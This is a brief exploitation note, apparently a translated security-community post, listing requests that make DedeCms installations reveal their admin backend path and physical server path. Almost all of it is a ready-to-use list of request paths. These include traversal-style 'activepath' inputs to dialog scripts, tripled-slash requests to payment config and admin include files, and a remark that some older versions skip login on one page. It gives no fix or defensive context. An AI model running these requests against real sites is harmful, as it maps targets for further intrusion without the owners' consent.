Main methods for disclosing paths in DedeCms

Affected versions

Unknown

Exploitation methods

Disclosing the admin (backend) path

1:include/dialog/select_soft.php
2:include/dialog/config.php
3:include/dialog/select_soft.php?activepath=/include/FCKeditor
4:include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
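5:In addition, on some older versions of DEDECMS, accessing this page skips login verification and displays the content directly, and /././././././././ can also be used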
6:require/dialog/select_soft.php?activepath=/././././././././
7:include\dialog\select_images.php
8:include\dialog\select_media.php
9:include\dialog\select_templets.php
10:robots.txt
11:include/dialog/select_media.php?f=form1.mur

Disclosing the physical path

1:http://localhost/dedecmsgbk///member/inc/config_pay_yeepay.php
2:http://localhost/dedecmsgbk///member/inc/config_pay_tenpay.php
3:http://localhost/dedecmsgbk///member/inc/config_pay_nps.php
4:http://localhost/dedecmsgbk///member/inc/config_pay_cbpayment.php
5:http://localhost/dedecmsgbk///member/inc/config_pay_alipay.php
6:http://localhost/dedecmsgbk///include/downmix.inc.php
7:http://localhost/dedecmsgbk///dede/inc/inc_coonepage.php
8:http://localhost/dedecmsgbk///dede/inc/inc_archives_functions.php
9:http://localhost/dedecmsgbk///dede/diy_field_edit.php